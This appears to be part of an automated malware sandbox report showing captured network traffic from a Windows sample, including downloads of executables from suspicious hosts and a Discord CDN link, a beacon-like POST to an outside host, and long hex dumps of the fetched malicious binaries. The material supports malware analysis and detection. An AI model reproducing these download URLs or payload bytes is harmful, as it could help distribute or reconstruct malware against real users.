                                                                                                                                                                                                          Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 46I:82OOjpYJRg%XQAc}yc0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          8192.168.2.34974631.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.920555115 CET1104OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: privacytools-foryou-777.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985121012 CET1105INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:40 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Content-Length: 347136
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Last-Modified: Fri, 31 Dec 2021 18:22:02 GMT
                                                                                                                                                                                                          ETag: "54c00-5d4753f51d529"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 59 56 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 12 04 00 00 d6 33 00 00 00 00 00 10 4a 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 cf 1d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 11 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 64 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 11 04 00 00 10 00 00 00 12 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 75 68 69 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 a2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 f4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 14 04 00 ae 14 04 00 c2 14 04 00 d8 14 04 00 e8 14 04 00 fe 14 04 00 0e 15 04 00 2a 15 04 00 3e 15 04 00 54 15 04 00 6e 15 04 00 88 15 04 00 a0 15 04 00 b4
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#OB!B!B!B!4B!4B!:B!B (B!4B!4B!4B!RichB!PELYV_3J0@ 8(p7N7d"0@.text `.data*30@.fuhi`7@.rsrcNp7P@@.relocV7X@B*>Tn


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          9192.168.2.34974731.28.27.13080C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.110701084 CET1465OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Referer: http://sxruse.net/
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Content-Length: 132
                                                                                                                                                                                                          Host: host-data-coin-11.com
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.187527895 CET1466INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:43 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          0192.168.2.349799162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC0OUTGET /attachments/916319571638620172/925647741571452938/Pyroxylic.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: cdn.discordapp.com
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:22:59 GMT
                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                          Content-Length: 537600
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          CF-Ray: 6c658958aa2c5c7a-FRA
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Age: 195906
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                          Content-Disposition: attachment;%20filename=Pyroxylic.exe
                                                                                                                                                                                                          ETag: "7fce0e163ea7948c10b044b1ea77dad9"
                                                                                                                                                                                                          Expires: Sat, 31 Dec 2022 18:22:59 GMT
                                                                                                                                                                                                          Last-Modified: Wed, 29 Dec 2021 07:13:39 GMT
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                          x-goog-generation: 1640762019336518
                                                                                                                                                                                                          x-goog-hash: crc32c=DEsdtA==
                                                                                                                                                                                                          x-goog-hash: md5=f84OFj6nlIwQsESx6nfa2Q==
                                                                                                                                                                                                          x-goog-metageneration: 1
                                                                                                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                                                                                                          x-goog-stored-content-length: 537600
                                                                                                                                                                                                          X-GUploader-UploadID: ADPycdtbIqvKEqSmZZlbnzA0UZu5K_9FTOzw6gxvgOcyvaCLoqYGSY3Swu1P_nJEZF0PB77ekA8c1tY_GmZqc8OOUvs
                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 53 78 79 48 41 61 36 52 67 54 59 44 30 62 73 48 57 6f 73 56 42 4f 41 74 66 56 6b 49 61 47 55 76 54 65 47 79 67 76 6e 70 55 5a 53 34 41 69 30 62 53 4d 49 42 54 34 55 74 6e 36 33 77 49 72 25 32 42 4e 6d 63 54 48 69 6a 25 32 46 43 62 4c 6c 65 4a 54 4c 6b 6a 59 6c 6f 62 39 72 50 72 66 25 32 42 78 35 56 30 42 4c 39 74 4f 48 73 64 51 75 4f 70 25 32 46 65 58 4a 6d 4b 55 35 69 33 4e 65 68 32 31 52 54 4b 78 5a 57 25 32 46 58 48 7a 38 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                                                                                                                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SxyHAa6RgTYD0bsHWosVBOAtfVkIaGUvTeGygvnpUZS4Ai0bSMIBT4Utn63wIr%2BNmcTHij%2FCbLleJTLkjYlob9rPrf%2Bx5V0BL9tOHsdQuOp%2FeXJmKU5i3Neh21RTKxZW%2FXHz8Q%3D%3D"}],"group":"cf-nel","max_a
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 9b b6 87 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2c 08 00 00 06 00 00 00 00 00 00 0e 4a 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0,J `@ @
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC2INData Raw: 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 f6 28 a9 00 00 06 28 60
                                                                                                                                                                                                          Data Ascii: ****(*(**0***(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*0**((`
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC4INData Raw: 06 12 03 11 04 11 05 11 06 17 1b 1f 11 06 28 93 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f 18 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 09 1b 1f 19 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0e 1f 09 1f 1a 06 28 93 00 00 06 12 05 11 06 09 11 04 19 1f 0e 1f 1b 06 28 93 00 00 06 12 04 11 05 11 06 09 1e 1f 14 1f 1c 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 0d 1b 1f 1d 06 28 93 00 00 06 12 06 09 11 04 11 05 18 1f 09 1f 1e 06 28
                                                                                                                                                                                                          Data Ascii: ((((((((((((((
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC5INData Raw: 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04 11 08 07 17 59 40 50 00 00 00 06 16 3e 49 00 00 00 11 04 11 06 61 13 0e 16 13 0f 38 2d 00 00 00 11 0f 16 3e 0c 00 00 00 11 0b 1e 62 13 0b 11 0c 1e 58 13 0c 08 11 0a 11 0f 58 11 0e 11 0b 5f 11 0c 1f 1f 5f 64 d2 9c 11 0f 17 58 13 0f 11 0f 06 3f cb ff ff ff 38 49 00 00 00 11 04 11 06 61 13 10 08 11 0a 11 10 20 ff 00 00 00 5f d2 9c 08 11 0a 17
                                                                                                                                                                                                          Data Ascii: Y@I>BX8#>biXY`X?8.XXbXb`Xb``%(XY@P>Ia8->bXX__dX?8Ia _
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC7INData Raw: 28 00 1f 0d 64 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11 06 3f c9 ff ff ff 38 4d 00 00 00 11 09 11 0a 61 13 15 11 08 11 0f 11 15 20 ff 00 00 00 5f d2 9c 11 08 11 0f 17 58 11 15 20 00 ff 00 00 5f 1e 64 d2 9c 11 08 11 0f 18 58 11 15 20 00 00 ff 00 5f 1f 10 64 d2 9c 11 08 11 0f 19 58 11 15 20 00 00 00 ff 5f 1f 18 64 d2 9c 11 0e 17 58 13 0e 11 0e 11 07 3f 26 fd ff ff 11 08 13 05 14 13 08 11 05 8e 69
                                                                                                                                                                                                          Data Ascii: (da((+X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX?8Ma _X _dX _dX _dX?&i
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC8INData Raw: 02 03 04 05 0e 04 0e 05 6f 31 01 00 06 13 05 38 06 00 00 00 17 80 58 00 00 04 11 05 2a 7e 5f 00 00 04 02 03 04 05 0e 04 0e 05 6f 31 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 55 0f 00 70 18 8d 25 00 00 01 25 16 d0 14 00 00 01 28 23 00 00 0a a2 25 17 d0 25 00 00 01 28 23 00 00 0a a2 28 6d 00 00 0a 14 18 8d 0a 00 00 01 25 16 02 8c 14 00 00 01 a2 25 17 03 a2 6f 6e 00 00 0a 74 4e 00 00 01 2a 00 1b 30 08 00 9e 65 00 00 12 00 00 11 20 1f 02 00 00 fe 0e 74 00 38 00 00 00 00 fe 0c 74 00 45 a4 02 00 00 d6 1b 00 00 37 28 00 00 52 55 00 00 03 2b 00 00 3a 1a 00 00 79
                                                                                                                                                                                                          Data Ascii: o18X*~_o1**0(*&*0SQ(#rUp%%(#%%(#(m%%ontN*0e t8tE7(RU+:y
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC9INData Raw: 00 31 20 00 00 f9 48 00 00 aa 2d 00 00 ef 01 00 00 32 3d 00 00 30 27 00 00 29 59 00 00 fe 47 00 00 2c 11 00 00 08 20 00 00 97 49 00 00 73 3d 00 00 e4 4a 00 00 d3 45 00 00 79 05 00 00 f0 27 00 00 2a 4d 00 00 65 1e 00 00 27 10 00 00 54 15 00 00 93 4c 00 00 bb 17 00 00 b4 19 00 00 bb 34 00 00 56 48 00 00 7c 13 00 00 72 02 00 00 d6 50 00 00 22 3b 00 00 e8 41 00 00 86 47 00 00 b2 4a 00 00 22 2d 00 00 fe 0d 00 00 ff 3a 00 00 b5 54 00 00 51 3b 00 00 77 33 00 00 81 0f 00 00 bd 1b 00 00 01 01 00 00 16 46 00 00 08 06 00 00 9d 10 00 00 e6 48 00 00 56 4a 00 00 1c 1d 00 00 86 07 00 00 6e 1c 00 00 0a 09 00 00 e7 2b 00 00 66 53 00 00 39 01 00 00 fb 39 00 00 75 11 00 00 3a 38 00 00 0a 4f 00 00 d6 16 00 00 0e 04 00 00 a5 4f 00 00 cb 4a 00 00 78 39 00 00 55 46 00 00 1c 38
                                                                                                                                                                                                          Data Ascii: 1 H-2=0')YG, Is=JEy'*Me'TL4VH|rP";AGJ"-:TQ;w3FHVJn+fS99u:8OOJx9UF8
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC11INData Raw: 83 4d 00 00 e7 55 00 00 14 54 00 00 ae 0d 00 00 f5 50 00 00 50 0a 00 00 96 2b 00 00 96 07 00 00 b8 3e 00 00 f0 4f 00 00 ca 15 00 00 3f 20 00 00 e1 12 00 00 fd 2b 00 00 bc 08 00 00 d6 52 00 00 4e 0d 00 00 dc 3c 00 00 c4 27 00 00 e3 35 00 00 2d 52 00 00 73 07 00 00 52 4f 00 00 07 57 00 00 dc 4e 00 00 92 52 00 00 42 1c 00 00 46 32 00 00 2a 42 00 00 a0 0f 00 00 e9 58 00 00 6c 3c 00 00 27 12 00 00 23 03 00 00 5f 38 00 00 25 1b 00 00 d2 3d 00 00 75 4d 00 00 93 58 00 00 53 17 00 00 c9 40 00 00 fe 0f 00 00 51 13 00 00 53 40 00 00 b4 1e 00 00 fe 52 00 00 c7 0d 00 00 57 3c 00 00 1d 43 00 00 3b 57 00 00 38 d1 1b 00 00 20 13 00 00 00 20 44 00 00 00 58 fe 0e 06 00 20 ce 01 00 00 38 4d f5 ff ff 11 03 11 60 11 30 58 11 00 11 42 5f 11 56 1f 1f 5f 64 d2 9c 20 45 00 00 00
                                                                                                                                                                                                          Data Ascii: MUTPP+>O? +RN<'5-RsROWNRBF2*BXl<'#_8%=uMXS@QS@RW<C;W8 DX 8M`0XB_V_d E
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC12INData Raw: ff 26 20 16 00 00 00 38 ce f0 ff ff 20 12 00 00 00 20 58 00 00 00 58 fe 0e 59 00 20 57 01 00 00 28 1f 01 00 06 39 b0 f0 ff ff 26 20 b1 00 00 00 38 a5 f0 ff ff 20 8a 00 00 00 20 2e 00 00 00 59 fe 0e 5e 00 20 9c 02 00 00 38 8c f0 ff ff fe 0c 36 00 20 05 00 00 00 fe 0c 5e 00 9c 20 ac 00 00 00 28 1e 01 00 06 39 6f f0 ff ff 26 20 1e 01 00 00 38 64 f0 ff ff 11 60 13 15 20 11 00 00 00 28 1f 01 00 06 3a 51 f0 ff ff 26 20 fe 00 00 00 38 46 f0 ff ff fe 0c 36 00 20 08 00 00 00 20 2c 00 00 00 20 1b 00 00 00 58 9c 20 01 01 00 00 28 1e 01 00 06 3a 22 f0 ff ff 26 20 19 00 00 00 38 17 f0 ff ff 11 16 28 01 01 00 06 26 20 aa 01 00 00 fe 0e 74 00 38 fd ef ff ff 38 06 41 00 00 20 30 02 00 00 38 f2 ef ff ff fe 0c 36 00 20 0e 00 00 00 fe 0c 5e 00 9c 20 0e 00 00 00 28 1f 01 00
                                                                                                                                                                                                          Data Ascii: & 8 XXY W(9& 8 .Y^ 86 ^ (9o& 8d` (:Q& 8F6 , X (:"& 8(& t88A 086 ^ (
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC13INData Raw: 00 28 1f 01 00 06 3a 76 eb ff ff 26 20 39 00 00 00 38 6b eb ff ff fe 0c 6d 00 20 00 00 00 00 fe 0c 06 00 9c 20 90 00 00 00 28 1f 01 00 06 39 4e eb ff ff 26 20 2f 00 00 00 38 43 eb ff ff fe 0c 6d 00 20 0a 00 00 00 fe 0c 06 00 9c 20 7e 01 00 00 28 1f 01 00 06 39 26 eb ff ff 26 20 22 00 00 00 38 1b eb ff ff fe 0c 36 00 20 0a 00 00 00 20 77 00 00 00 20 54 00 00 00 58 9c 20 08 01 00 00 38 fc ea ff ff 00 11 55 28 d7 00 00 06 28 d8 00 00 06 13 57 20 01 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 5a 00 45 02 00 00 00 16 02 00 00 05 00 00 00 38 11 02 00 00 00 38 40 00 00 00 20 02 00 00 00 38 04 00 00 00 fe 0c 39 00 45 0a 00 00 00 cc 00 00 00 4c 00 00 00 b4 00 00 00 95 00 00 00 db 00 00 00 05 00 00 00 2b 00 00 00 6b 00 00 00 08 01
                                                                                                                                                                                                          Data Ascii: (:v& 98km (9N& /8Cm ~(9&& "86 w TX 8U((W (:& 8ZE88@ 89EL+k
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC15INData Raw: 24 e6 ff ff 26 20 f2 01 00 00 38 19 e6 ff ff fe 0c 36 00 20 0c 00 00 00 20 5d 00 00 00 20 70 00 00 00 58 9c 20 d8 01 00 00 28 1e 01 00 06 3a f5 e5 ff ff 26 20 cb 01 00 00 38 ea e5 ff ff fe 0c 36 00 20 03 00 00 00 20 e9 00 00 00 20 4d 00 00 00 59 9c 20 51 00 00 00 38 cb e5 ff ff fe 0c 36 00 20 14 00 00 00 fe 0c 5e 00 9c 20 c5 01 00 00 38 b3 e5 ff ff 11 37 11 0f 18 58 11 71 18 91 9c 20 a3 00 00 00 28 1f 01 00 06 3a 99 e5 ff ff 26 20 94 01 00 00 38 8e e5 ff ff 11 47 19 11 4f 17 91 9c 20 cd 01 00 00 38 7c e5 ff ff 38 d4 f6 ff ff 20 90 02 00 00 38 6d e5 ff ff 20 a0 00 00 00 20 26 00 00 00 59 fe 0e 5e 00 20 0c 00 00 00 28 1e 01 00 06 39 4f e5 ff ff 26 20 e8 00 00 00 38 44 e5 ff ff 11 37 11 6b 11 61 16 91 9c 20 e4 00 00 00 28 1f 01 00 06 3a 2c e5 ff ff 26 20 53
                                                                                                                                                                                                          Data Ascii: $& 86 ] pX (:& 86 MY Q86 ^ 87Xq (:& 8GO 8|8 8m &Y^ (9O& 8D7ka (:,& S
